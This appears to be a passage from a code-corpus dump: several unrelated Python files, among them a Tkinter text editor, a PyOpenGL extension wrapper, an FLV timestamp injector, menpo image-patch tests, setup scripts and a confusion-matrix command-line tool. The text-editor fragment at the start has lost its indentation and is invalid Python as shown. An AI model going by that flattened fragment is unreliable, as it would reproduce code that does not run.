text_editor = tk.Text(main_application)
text_editor.config(wrap='word', relief=tk.FLAT)
scroll_bar = tk.Scrollbar(main_application)
text_editor.focus_set()
scroll_bar.pack(side=tk.RIGHT, fill=tk.Y)
text_editor.pack(fill=tk.BOTH, expand=True)
scroll_bar.config(command=text_editor.yview)
text_editor.config(yscrollcommand=scroll_bar.set)
# font family and font size functionality
current_font_family = 'Arial'
current_font_size = 12
def change_font(event=None):
global current_font_family
current_font_family = font_family.get()
text_editor.configure(font=(current_font_family, current_font_size))
def change_fontsize(event=None):
global current_font_size
current_font_size = size_var.get()
text_editor.configure(font=(current_font_family, current_font_size))
font_box.bind("<<ComboboxSelected>>", change_font)
font_size.bind("<<ComboboxSelected>>", change_fontsize)
######## buttons functionality
# bold button functionality
def change_bold():
text_property = tk.font.Font(font=text_editor['font'])
if text_property.actual()['weight'] == 'normal':
text_editor.configure(font=(current_font_family, current_font_size, 'bold'))
if text_property.actual()['weight'] == 'bold':
text_editor.configure(font=(current_font_family, current_font_size, 'normal'))
bold_btn.configure(command=change_bold)
# italic functionlaity
def change_italic():
text_property = tk.font.Font(font=text_editor['font'])
if text_property.actual()['slant'] == 'roman':
text_editor.configure(font=(current_font_family, current_font_size, 'italic'))
if text_property.actual()['slant'] == 'italic':
text_editor.configure(font=(current_font_family, current_font_size, 'normal'))
italic_btn.configure(command=change_italic)
# underline functionality
def change_underline():
text_property = tk.font.Font(font=text_editor['font'])
if text_property.actual()['underline'] == 0:
text_editor.configure(font=(current_font_family, current_font_size, 'underline'))
if text_property.actual()['underline'] == 1:
text_editor.configure(font=(current_font_family, current_font_size, 'normal'))
underline_btn.configure(command=change_underline)
## font color functionality
def change_font_color():
color_var = tk.colorchooser.askcolor()
text_editor.configure(fg=color_var[1])
font_color_btn.configure(command=change_font_color)
### align functionality
def align_left():
text_content = text_editor.get(1.0, 'end')
text_editor.tag_config('left', justify=tk.LEFT)
text_editor.delete(1.0, tk.END)
text_editor.insert(tk.INSERT, text_content, 'left')
align_left_btn.configure(command=align_left)
## center
def align_center():
text_content = text_editor.get(1.0, 'end')
text_editor.tag_config('center', justify=tk.CENTER)
text_editor.delete(1.0, tk.END)
text_editor.insert(tk.INSERT, text_content, 'center')
align_center_btn.configure(command=align_center)
## right
def align_right():
text_content = text_editor.get(1.0, 'end')
text_editor.tag_config('right', justify=tk.RIGHT)
text_editor.delete(1.0, tk.END)
text_editor.insert(tk.INSERT, text_content, 'right')
align_right_btn.configure(command=align_right)
text_editor.configure(font=('Arial', 12))
# -------------------------------------&&&&&&&& End text editor &&&&&&&&&&& ----------------------------------
############################################## status bar ###################################################
status_bar = ttk.Label(main_application, text = 'Status Bar')
status_bar.pack(side=tk.BOTTOM)
text_changed = False
def changed(event=None):
global text_changed
if text_editor.edit_modified():
text_changed = True
words = len(text_editor.get(1.0, 'end-1c').split())
characters = len(text_editor.get(1.0, 'end-1c'))
status_bar.config(text=f'Characters : {characters} Words : {words}')
text_editor.edit_modified(False)
text_editor.bind('<<Modified>>', changed)
# -------------------------------------&&&&&&&& End status bar &&&&&&&&&&& ----------------------------------
############################################## main menu functinality ###################################################
## variable
url = ''
## new functionality
def new_file(event=None):
global url
url = ''
text_editor.delete(1.0, tk.END)
## file commands
file.add_command(label='New', image=new_icon, compound=tk.LEFT, accelerator='Ctrl+N', command=new_file)
## open functionality
def open_file(event=None):
global url
url = filedialog.askopenfilename(initialdir=os.getcwd(), title='Select File', filetypes=(('Text File', '*.txt'), ('All files', '*.*')))
try:
with open(url, 'r') as fr:
text_editor.delete(1.0, tk.END)
text_editor.insert(1.0, fr.read())
except FileNotFoundError:
return
except:
return
main_application.title(os.path.basename(url))
file.add_command(label='Open', image=open_icon, compound=tk.LEFT, accelerator='Ctrl+O', command=open_file)
## save file
def save_file(event=None):
global url
try:
if url:
content = str(text_editor.get(1.0, tk.END))
with open(url, 'w', encoding='utf-8') as fw:
fw.write(content)
else:
url = filedialog.asksaveasfile(mode = 'w', defaultextension='.txt', filetypes=(('Text File', '*.txt'), ('All files', '*.*')))
content2 = text_editor.get(1.0, tk.END)
url.write(content2)
url.close()
except:
return
file.add_command(label='Save', image=save_icon, compound=tk.LEFT, accelerator='Ctrl+S', command = save_file)
## save as functionality
def save_as(event=None):
global url
try:
content = text_editor.get(1.0, tk.END)
url = filedialog.asksaveasfile(mode = 'w', defaultextension='.txt', filetypes=(('Text File', '*.txt'), ('All files', '*.*')))
url.write(content)
url.close()
except:
return
file.add_command(label='Save As', image=save_as_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+S', command=save_as)
## exit functionality
def exit_func(event=None):
global url, text_changed
try:
if text_changed:
mbox = messagebox.askyesnocancel('Warning', 'Do you want to save the file ?')
if mbox is True:
if url:
content = text_editor.get(1.0, tk.END)
with open(url, 'w', encoding='utf-8') as fw:
fw.write(content)
main_application.destroy()
else:
content2 = str(text_editor.get(1.0, tk.END))
url = filedialog.asksaveasfile(mode = 'w', defaultextension='.txt', filetypes=(('Text File', '*.txt'), ('All files', '*.*')))
url.write(content2)
url.close()
main_application.destroy()
elif mbox is False:
main_application.destroy()
else:
main_application.destroy()
except:
return
file.add_command(label='Exit', image=exit_icon, compound=tk.LEFT, accelerator='Ctrl+Q', command=exit_func)
############ find functionality
def find_func(event=None):
def find():
word = find_input.get()
text_editor.tag_remove('match', '1.0', tk.END)
matches = 0
if word:
start_pos = '1.0'
while True:
start_pos = text_editor.search(word, start_pos, stopindex=tk.END)
if not start_pos:
break
end_pos = f'{start_pos}+{len(word)}c'
text_editor.tag_add('match', start_pos, end_pos)
matches += 1
start_pos = end_pos
text_editor.tag_config('match', foreground='red', background='yellow')
def replace():
word = find_input.get()
replace_text = replace_input.get()
content = text_editor.get(1.0, tk.END)
new_content = content.replace(word, replace_text)
text_editor.delete(1.0, tk.END)
text_editor.insert(1.0, new_content)
find_dialogue = tk.Toplevel()
find_dialogue.geometry('450x250+500+200')
find_dialogue.title('Find')
find_dialogue.resizable(0,0)
## frame
find_frame = ttk.LabelFrame(find_dialogue, text='Find/Replace')
find_frame.pack(pady=20)
## labels
text_find_label = ttk.Label(find_frame, text='Find : ')
text_replace_label = ttk.Label(find_frame, text= 'Replace')
## entry
find_input = ttk.Entry(find_frame, width=30)
replace_input = ttk.Entry(find_frame, width=30)
## button
find_button = ttk.Button(find_frame, text='Find', command=find)
replace_button = ttk.Button(find_frame, text= 'Replace', command=replace)
## label grid
text_find_label.grid(row=0, column=0, padx=4, pady=4)
text_replace_label.grid(row=1, column=0, padx=4, pady=4)
## entry grid
find_input.grid(row=0, column=1, padx=4, pady=4)
replace_input.grid(row=1, column=1, padx=4, pady=4)
## button grid
find_button.grid(row=2, column=0, padx=8, pady=4)
replace_button.grid(row=2, column=1, padx=8, pady=4)
find_dialogue.mainloop()
## edit commands
edit.add_command(label='Copy', image=copy_icon, compound=tk.LEFT, accelerator='Ctrl+C', command=lambda:text_editor.event_generate("<Control c>"))
edit.add_command(label='Paste', image=paste_icon, compound=tk.LEFT, accelerator='Ctrl+V', command=lambda:text_editor.event_generate("<Control v>"))
edit.add_command(label='Cut', image=cut_icon, compound=tk.LEFT, accelerator='Ctrl+X', command=lambda:text_editor.event_generate("<Control x>"))
edit.add_command(label='Clear All', image=clear_all_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+X', command= lambda:text_editor.delete(1.0, tk.END))
edit.add_command(label='Find', image=find_icon, compound=tk.LEFT, accelerator='Ctrl+F', command = find_func)
## view check button
show_statusbar = tk.BooleanVar()
show_statusbar.set(True)
show_toolbar = tk.BooleanVar()
show_toolbar.set(True)
def hide_toolbar():
global show_toolbar
if show_toolbar:
tool_bar.pack_forget()
show_toolbar = False
else :
text_editor.pack_forget()
status_bar.pack_forget()
tool_bar.pack(side=tk.TOP, fill=tk.X)
text_editor.pack(fill=tk.BOTH, expand=True)
status_bar.pack(side=tk.BOTTOM)
show_toolbar = True
def hide_statusbar():
global show_statusbar
if show_statusbar:
status_bar.pack_forget()
show_statusbar = False
else :
status_bar.pack(side=tk.BOTTOM)
show_statusbar = True
view.add_checkbutton(label='Tool Bar',onvalue=True, offvalue=0,variable = show_toolbar, image=tool_bar_icon, compound=tk.LEFT, command=hide_toolbar)
view.add_checkbutton(label='Status Bar',onvalue=1, offvalue=False,variable = show_statusbar, image=status_bar_icon, compound=tk.LEFT, command=hide_statusbar)
## color theme
def change_theme():
chosen_theme = theme_choice.get()
color_tuple = color_dict.get(chosen_theme)
fg_color, bg_color = color_tuple[0], color_tuple[1]
text_editor.config(background=bg_color, fg=fg_color)
count = 0
for i in color_dict:
color_theme.add_radiobutton(label = i, image=color_icons[count], variable=theme_choice, compound=tk.LEFT, command=change_theme)
count += 1
# -------------------------------------&&&&&&&& End main menu functinality&&&&&&&&&&& ----------------------------------
main_application.config(menu=main_menu)
#### bind shortcut keys
main_application.bind("<Control-n>", new_file)
main_application.bind("<Control-o>", open_file)
main_application.bind("<Control-s>", save_file)
main_application.bind("<Control-Alt-s>", save_as)
main_application.bind("<Control-q>", exit_func)
main_application.bind("<Control-f>", find_func)
main_application.mainloop() |
py | b414d8d3b62a637919cadd7df9dd7b40c65a59ee | '''OpenGL extension AMD.shader_stencil_export
This module customises the behaviour of the
OpenGL.raw.GL.AMD.shader_stencil_export to provide a more
Python-friendly API
Overview (from the spec)
In OpenGL, the stencil test is a powerful mechanism to selectively discard
fragments based on the content of the stencil buffer. However, facilites
to update the content of the stencil buffer are limited to operations such
as incrementing the existing value, or overwriting with a fixed reference
value.
This extension provides a mechanism whereby a shader may generate the
stencil reference value per invocation. When stencil testing is enabled,
this allows the test to be performed against the value generated in the
shader. When the stencil operation is set to GL_REPLACE, this allows a
value generated in the shader to be written to the stencil buffer directly.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/AMD/shader_stencil_export.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.AMD.shader_stencil_export import *
from OpenGL.raw.GL.AMD.shader_stencil_export import _EXTENSION_NAME
def glInitShaderStencilExportAMD():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
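# --- Illustrative usage sketch (hand-written addition, not part of the autogenerated
# wrapper). The extension adds no new GL entry points, so the Python side only needs the
# availability check above; the per-fragment stencil value is written in GLSL via the
# gl_FragStencilRefAMD output. This assumes a current GL context and PyOpenGL's
# OpenGL.GL.shaders helpers; the shader source is illustrative only.
def _example_compile_stencil_export_shader():
    from OpenGL.GL import GL_FRAGMENT_SHADER
    from OpenGL.GL import shaders
    if not glInitShaderStencilExportAMD():
        raise RuntimeError('GL_AMD_shader_stencil_export is not available')
    fragment_src = '''
    #version 150
    #extension GL_AMD_shader_stencil_export : require
    out vec4 color;
    void main() {
        color = vec4(1.0);
        gl_FragStencilRefAMD = 128;  // stencil reference generated by this invocation
    }
    '''
    # compileShader raises RuntimeError on a compile failure, so a returned shader object
    # means the driver accepted the stencil-export built-in.
    return shaders.compileShader(fragment_src, GL_FRAGMENT_SHADER)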
### END AUTOGENERATED SECTION |
py | b414d926b62e0ac9433b46f39542f62df7a040a1 | """
Helper program to inject absolute wall clock time into FLV stream for recordings
"""
import struct
import sys
import time
def make_ui8(num):
return struct.pack("B", num)
def make_ui32(num):
return struct.pack(">I", num)
def make_si32_extended(num):
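    # FLV stores a tag timestamp as a 24-bit big-endian value followed by an 8-bit
    # "extended" byte holding the most significant bits, so the leading byte of the
    # packed big-endian 32-bit integer is moved to the end.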
ret = struct.pack(">i", num)
return ret[1:] + bytes([ret[0]])
def make_ui24(num):
ret = struct.pack(">I", num)
return ret[1:]
def make_ui16(num):
return struct.pack(">H", num)
def create_script_tag(name, data, timestamp=0):
payload = make_ui8(2) # VALUE_TYPE_STRING
payload += make_string(name)
payload += make_ui8(3) # VALUE_TYPE_OBJECT
for k, v in data.items():
payload += make_string(k)
payload += make_ui8(0) # VALUE_TYPE_NUMBER
payload += make_number(v)
payload += make_ui24(9) # End of object
tag_type = make_ui8(18) # 18 = TAG_TYPE_SCRIPT
timestamp = make_si32_extended(timestamp)
stream_id = make_ui24(0)
data_size = len(payload)
tag_size = data_size + 11
return b"".join(
[
tag_type,
make_ui24(data_size),
timestamp,
stream_id,
payload,
make_ui32(tag_size),
]
)
def make_string(string):
s = string.encode("UTF-8")
length = make_ui16(len(s))
return length + string.encode("UTF-8")
def make_number(num):
return struct.pack(">d", num)
def read_bytes(source, num_bytes):
read_bytes = 0
buf = b""
while read_bytes < num_bytes:
d_in = source.read(num_bytes - read_bytes)
if d_in:
read_bytes += len(d_in)
buf += d_in
else:
return buf
return buf
def write(data):
sys.stdout.buffer.write(data)
def main():
if sys.platform == "win32":
import msvcrt
import os
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
source = sys.stdin.buffer
header = read_bytes(source, 3)
if header != b"FLV":
print("Not a valid FLV file")
return
write(header)
# Skip rest of FLV header
write(read_bytes(source, 6))
i = 0
while True:
# Packet structure from Wikipedia:
#
# Size of previous packet uint32_be 0 For first packet set to NULL
# Packet Type uint8 18 For first packet set to AMF Metadata
# Payload Size uint24_be varies Size of packet data only
# Timestamp Lower uint24_be 0 For first packet set to NULL
# Timestamp Upper uint8 0 Extension to create a uint32_be value
# Stream ID uint24_be 0 For first stream of same type set to NULL
#
# Payload Data freeform varies Data as defined by packet type
header = read_bytes(source, 15)
if len(header) != 15:
write(header)
return
# Get payload size to know how many bytes to read
high, low = struct.unpack(">BH", header[5:8])
payload_size = (high << 16) + low
# Get timestamp to inject into clock sync tag
low_high = header[8:12]
combined = bytes([low_high[3]]) + low_high[:3]
timestamp = struct.unpack(">i", combined)[0]
if i % 3:
# Insert a custom packet every so often for time synchronization
# Reference based on flvlib:
# data = flv.libastypes.FLVObject()
# data["streamClock"] = int(timestamp)
# data["streamClockBase"] = 0
# data["wallClock"] = time.time() * 1000
# packet_to_inject = flvlib.tags.create_script_tag(
# "onClockSync", data, timestamp))
data = {
"streamClock": int(timestamp),
"streamClockBase": 0,
"wallClock": time.time() * 1000,
}
write(make_ui32(payload_size + 15)) # Write previous packet size
write(create_script_tag("onClockSync", data, timestamp))
# Write rest of original packet minus previous packet size
write(header[4:])
write(read_bytes(source, payload_size))
else:
# Write the original packet
write(header)
write(read_bytes(source, payload_size))
i += 1
if __name__ == "__main__":
main()
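# Typical invocation (assumed; the script reads FLV on stdin and writes FLV on stdout):
#   ffmpeg -i <input> -c copy -f flv - | python <this script> > synced.flv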
|
py | b414d945aa305c1a340ff1b469bd14502aa3d946 | import sys
workload = sys.argv[1]
bandwidth = sys.argv[2]
delay = sys.argv[3]
load = sys.argv[4]
protocol = sys.argv[5]
folder = "workload/dc_workload/all-to-all-144-"+workload
inpfilename = protocol+"-"+bandwidth+"G-"+delay+"ns-"+load+".stats"
outfilename = protocol+"-"+bandwidth+"G-"+delay+"ns-"+load+".out"
f = open(folder+"/"+inpfilename, "r")
out = open(folder+"/"+outfilename, "w")
out.write("Flow ID,"+"Src,"+"Dst,"+"Flow Size(bytes),"+"Flow Completion Time(secs),"+"Slowdown,"+"Throughput(Gbps)")
out.write("\n")
for line in f:
tokens = line.split()
if (tokens[0] != '##'):
flowid = int(tokens[0])
src = int(tokens[2])
dst = int(tokens[3])
flowsize = int(tokens[1])
fct = float(tokens[6])*1e-6
slowdown = float(tokens[8])
rate = (flowsize*8.0) / (fct*1e9)
if (slowdown < 1.0):
out.write("Problem,")
out.write(str(flowid)+","+str(src)+","+str(dst)+","+str(flowsize)+","+str(fct)+","+str(slowdown)+","+str(rate)+"\n")
f.close()
out.close()
|
py | b414d9c80384620cc2516c47ca1a502f8dc71378 | import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import assert_equals
import menpo.io as mio
from menpo.landmark import labeller, face_ibug_68_to_face_ibug_68
from menpo.image.base import (Image, _convert_patches_list_to_single_array,
_create_patches_image)
from menpo.shape import PointCloud
#######################
# EXTRACT PATCHES TESTS
#######################
def test_double_type():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.float64)
def test_float_type():
image = mio.import_builtin_asset('breakingbad.jpg')
image.pixels = image.pixels.astype(np.float32)
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.float32)
def test_uint8_type():
image = mio.import_builtin_asset('breakingbad.jpg', normalize=False)
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.uint8)
def test_uint16_type():
image = Image.init_blank([100, 100], dtype=np.uint16)
patch_shape = (16, 16)
landmarks = PointCloud(np.array([[50, 50.]]))
patches = image.extract_patches(landmarks,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.uint16)
def test_int_pointcloud():
image = Image.init_blank([100, 100])
patch_shape = (16, 16)
landmarks = PointCloud(np.array([[50, 50]]))
patches = image.extract_patches(landmarks,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.float)
def test_uint8_type_single_array():
image = mio.import_builtin_asset('breakingbad.jpg', normalize=False)
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=True)
assert(patches.dtype == np.uint8)
def test_squared_even_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_squared_odd_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (15, 15)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_nonsquared_even_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 18)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_nonsquared_odd_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (15, 17)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_nonsquared_even_odd_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (15, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_squared_even_patches_landmarks():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 16)
patches = image.extract_patches_around_landmarks('PTS',
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_squared_even_patches_single_array():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
as_single_array=True,
patch_shape=patch_shape)
assert_equals(patches.shape, ((68, 1, 3) + patch_shape))
def test_squared_even_patches_sample_offsets():
image = mio.import_builtin_asset('breakingbad.jpg')
sample_offsets = np.array([[0, 0], [1, 0]])
patches = image.extract_patches(image.landmarks['PTS'].lms,
sample_offsets=sample_offsets,
as_single_array=False)
assert_equals(len(patches), 136)
#######################
# SET PATCHES TESTS
#######################
def test_single_ndarray_patch():
patch_shape = (21, 7)
n_channels = 4
im = Image.init_blank(patch_shape, n_channels)
patch = np.zeros((2, 2, n_channels) + patch_shape)
patch[1, 0, ...] = np.ones((n_channels,) + patch_shape)
patch[1, 1, ...] = 2 * np.ones((n_channels,) + patch_shape)
patch_center = PointCloud(np.array([[10., 3.], [11., 3.]]))
new_im = im.set_patches(patch, patch_center, offset=(0, 0), offset_index=1)
res = np.zeros(patch_shape)
res[1:-1, :] = 2
assert_array_equal(new_im.pixels[2, ...], res)
def test_single_list_patch():
patch_shape = (21, 7)
n_channels = 4
im = Image.init_blank(patch_shape, n_channels)
patch = [Image(np.ones((n_channels,) + patch_shape)),
Image(2 * np.ones((n_channels,) + patch_shape))]
patch_center = PointCloud(np.array([[10., 3.], [11., 3.]]))
new_im = im.set_patches(patch, patch_center, offset=(0, 0), offset_index=0)
res = np.ones(patch_shape)
res[1:-1, :] = 2
assert_array_equal(new_im.pixels[2, ...], res)
def test_offset_argument():
patch_shape = (5, 6)
offsets = [(0., 0.), [0., 0.], np.array([[1., 1.]]), None]
image = mio.import_builtin_asset('breakingbad.jpg')
patch_center = PointCloud(np.array([[100., 101.], [50., 41.]]))
patch = np.zeros((2, 1, image.n_channels) + patch_shape)
patch[0, 0, ...] = np.ones((image.n_channels,) + patch_shape)
patch[1, 0, ...] = 2 * np.ones((image.n_channels,) + patch_shape)
for off in offsets:
image = image.set_patches(patch, patch_center, offset=off)
assert_array_equal(image.pixels[:, 98:103, 98:104], patch[0, 0, ...])
assert_array_equal(image.pixels[:, 48:53, 38:44], patch[1, 0, ...])
def test_convert_patches_list_to_single_array():
patch_shape = (7, 2)
n_channels = 10
n_centers = 2
n_offsets = 2
patches_list = [Image(1 * np.ones((n_channels,) + patch_shape)),
Image(2 * np.ones((n_channels,) + patch_shape)),
Image(3 * np.ones((n_channels,) + patch_shape)),
Image(4 * np.ones((n_channels,) + patch_shape))]
patches_array = np.zeros((n_centers, n_offsets, n_channels) + patch_shape)
patches_array[0, 0, ...] = patches_list[0].pixels
patches_array[0, 1, ...] = patches_list[1].pixels
patches_array[1, 0, ...] = patches_list[2].pixels
patches_array[1, 1, ...] = patches_list[3].pixels
assert_array_equal(
_convert_patches_list_to_single_array(patches_list, n_centers),
patches_array)
def test_set_patches_around_landmarks():
patch_shape = (21, 12)
image = mio.import_builtin_asset.lenna_png()
patches1 = image.extract_patches_around_landmarks(
patch_shape=patch_shape, as_single_array=True)
new_image1 = Image.init_blank(image.shape, image.n_channels)
new_image1.landmarks['LJSON'] = image.landmarks['LJSON']
extracted1 = new_image1.set_patches_around_landmarks(patches1)
patches2 = image.extract_patches_around_landmarks(
patch_shape=patch_shape, as_single_array=False)
new_image2 = Image.init_blank(image.shape, image.n_channels)
new_image2.landmarks['LJSON'] = image.landmarks['LJSON']
extracted2 = new_image2.set_patches_around_landmarks(patches2)
assert_array_equal(extracted1.pixels, extracted2.pixels)
def test_create_patches_image():
patch_shape = (7, 14)
image = mio.import_builtin_asset.lenna_png()
patches = image.extract_patches_around_landmarks(
patch_shape=patch_shape, as_single_array=True)
pc = image.landmarks['LJSON'].lms
patches_image = _create_patches_image(patches, pc, patches_indices=range(17))
assert(patches_image.n_channels == patches.shape[2])
assert(patches_image.landmarks.n_groups == 2)
assert(patches_image.landmarks['selected_patch_centers'].lms.n_points == 17)
assert(patches_image.landmarks['all_patch_centers'].lms.n_points == 68)
|
py | b414db6aa11d2a9a5c8c532e207003d295d58683 | from setuptools import setup
from tilebeard.__init__ import __version__
setup(
name = 'tilebeard',
version = __version__,
description = 'A minimal WMTS adapter for web frameworks.',
url = 'https://github.com/olegsson/tilebeard',
author = 'olegsson',
author_email = '[email protected]',
license = 'MIT',
packages = ['tilebeard'],
zip_safe = True,
classifiers = [
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
]
)
|
py | b414dbfa5666599bd91d9e1fb6e7347402eccb51 | import os.path
import setuptools
import sys
from numpy.distutils.core import setup
from numpy.distutils.misc_util import Configuration
include_dirs = []
library_dirs = []
if sys.platform == 'win32':
# Update the ``library_dir_option`` function in MSVCCompiler
# to add quotes around /LIBPATH entries.
import types
def _lib_dir_option(self, dir):
return '/LIBPATH:"%s"' % dir
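# e.g. library_dir_option(r'C:\Program Files\SDK\Lib') now yields '/LIBPATH:"C:\Program Files\SDK\Lib"'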
from distutils.msvc9compiler import MSVCCompiler
setattr(MSVCCompiler, 'library_dir_option',
types.MethodType(_lib_dir_option, None, MSVCCompiler))
sdkdir = os.environ.get('WindowsSdkDir')
if sdkdir:
include_dirs.append(os.path.join(sdkdir,'Include'))
library_dirs.append(os.path.join(sdkdir,'Lib'))
# make sure we have mt.exe available in case we need it
path = os.environ['PATH'].split(';')
path.append(os.path.join(sdkdir,'bin'))
os.environ['PATH'] = ';'.join(path)
config = Configuration(name='slsqp')
config.add_extension('slsqp',
sources=['*.f',
'f2py/slsqp.pyf'],
include_dirs=include_dirs,
library_dirs=library_dirs)
config.add_data_files('LICENSE','README')
kwds = {'install_requires':['numpy'],
'version': '1.0.2',
'zip_safe': False,
'license': 'permissive open source',
# NOTE: we use 'url' here, but it really translates to 'home-page'
# in the metadata. Go figure.
'url': 'http://www.pyopt.org',
'package_data': {'openmdao.main': ['*.html']},
}
kwds.update(config.todict())
setup(**kwds)
|
py | b414dc32951fd8eb7bdf4cb99d4db25644d6c0dd | import argparse
import csv
import traceback
from enum import Enum
from scm.matrix import ConfusionMatrix, MatrixType, load_csv
class OutputFormat(Enum):
"""
The types of output formats.
Argparse integration taken from here:
https://stackoverflow.com/a/55500795/4698227
"""
CSV = 1
PLAINTEXT = 2
def __str__(self):
return self.name.lower()
def __repr__(self):
return str(self)
@staticmethod
def argparse(s):
try:
return OutputFormat[s.upper()]
except KeyError:
return s
def generate(input_file, output_file, col_act, col_pred, col_weight=None, matrix_type=MatrixType.COUNTS,
delimiter=",", quotechar="\"", header=True, labels=None, prefix_act="a: ", prefix_pred="p: ", corner="x",
output_format=OutputFormat.CSV, max_decimals=3):
"""
Generates the confusion matrix from the CSV file. Outputs the result on stdout if no output file is provided.
:param input_file: the CSV file to load actual/predicted labels from
:type input_file: str
:param output_file: the (optional) CSV file to write the matrix to
:type output_file: str
:param col_act: the 1-based index of the column that contains the actual/ground truth labels
:type col_act: int
:param col_pred: the 1-based index of the column that contains the predicted labels
:type col_pred: int
:param col_weight: the 1-based index of the (optional) column containing the weight (0-1) for the predictions, default is None
:type col_weight: int
:param matrix_type: the type of matrix to generate
:type matrix_type: MatrixType
:param delimiter: the delimiter to use for the CSV file
:type delimiter: str
:param quotechar: the quote character to use for the CSV file
:type quotechar: str
:param header: whether the CSV file has a header
:type header: bool
:param labels: the (optional) list of predefined labels to use
:type labels: list
:param prefix_act: the prefix to use for the actual cells (left column)
:type prefix_act: str
:param prefix_pred: the prefix to use for the predicted cells (top row)
:type prefix_pred: str
:param corner: the text to print in the top-left corner
:type corner: str
:param output_format: the format to use when writing to a file (csv|plaintext)
:type output_format: OutputFormat
:param max_decimals: the maximum decimals after the decimal point to use in case of float values, -1 for no restrictions
:type max_decimals: int
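Example (illustrative; the file names are hypothetical):
generate("predictions.csv", None, 1, 2)  # print a counts matrix to stdout
generate("predictions.csv", "matrix.csv", 1, 2, output_format=OutputFormat.CSV)  # write it to a CSV file instead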
"""
actual, predicted, weight = load_csv(input_file, col_act, col_pred, col_weight=col_weight,
delimiter=delimiter, quotechar=quotechar, header=header)
matrix = ConfusionMatrix(actual, predicted, weight=weight, labels=labels,
actual_prefix=prefix_act, predicted_prefix=prefix_pred, corner=corner)
result = matrix.generate(matrix_type=matrix_type, max_decimals=max_decimals)
if output_file is None:
print(result.to_plaintext())
else:
with open(output_file, "w") as outputf:
if output_format == OutputFormat.CSV:
result.to_csv(output_file, delimiter=delimiter, quotechar=quotechar, quoting=csv.QUOTE_MINIMAL)
elif output_format == OutputFormat.PLAINTEXT:
outputf.write(result.to_plaintext())
else:
raise Exception("Unhandled output format: " + str(output_format))
def main(args=None):
"""
Performs the matrix generation.
Use -h to see all options.
:param args: the command-line arguments to use, uses sys.argv if None
:type args: list
"""
parser = argparse.ArgumentParser(
description='Generates a confusion matrix from a CSV file with actual/predicted label columns.',
prog="scm-generate",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-i", "--input", dest="input_file", metavar="FILE", required=True, help="the CSV file to load the actual/predicted labels from")
parser.add_argument("-d", "--delimiter", dest="delimiter", metavar="DELIMITER", required=False, default=",", help="the column delimited in the CSV file")
parser.add_argument("-q", "--quotechar", dest="quotechar", metavar="CHAR", required=False, default="\"", help="the quote character to use in the CSV file")
parser.add_argument("-H", "--no_header", action="store_false", dest="header", help="whether the CSV file has no header row")
parser.add_argument("-o", "--output", dest="output_file", metavar="FILE", required=False, help="the optional CSV file to write the generated matrix to")
parser.add_argument("-O", "--output_format", dest="output_format", metavar="FORMAT", required=False, default=OutputFormat.CSV, choices=list(OutputFormat), type=OutputFormat.argparse, help="the output format to use when writing to the output file")
parser.add_argument("-a", "--actual", dest="col_act", metavar="COL", required=False, default=1, type=int, help="the 1-based column index for the actual/ground truth labels")
parser.add_argument("-A", "--actual_prefix", dest="prefix_act", metavar="PREFIX", required=False, default="a: ", type=str, help="the prefix to use for the labels depicted in the 'actual' labels column")
parser.add_argument("-p", "--predicted", dest="col_pred", metavar="COL", required=False, default=2, type=int, help="the 1-based column index for the predicted labels")
parser.add_argument("-P", "--predicted_prefix", dest="prefix_pred", metavar="PREFIX", required=False, default="p: ", type=str, help="the prefix to use for the labels depicted in the 'predicted' labels row")
parser.add_argument("-w", "--weight", dest="col_weight", metavar="COL", required=False, default=None, type=int, help="the 1-based column index for the weight (0-1) of the predicted label")
parser.add_argument("-l", "--labels", dest="labels", metavar="LABELS", required=False, default=None, type=str, help="comma-separated list of predefined labels to use (eg if not all labels present in CSV file)")
parser.add_argument("-C", "--corner", dest="corner", metavar="CORNER", required=False, default="x", type=str, help="the text to print in the top-left corner")
parser.add_argument("-D", "--max_decimals", dest="max_decimals", metavar="NUM", required=False, default=3, type=int, help="the maximum number of decimals after the decimal point to use in case of float values like percentages")
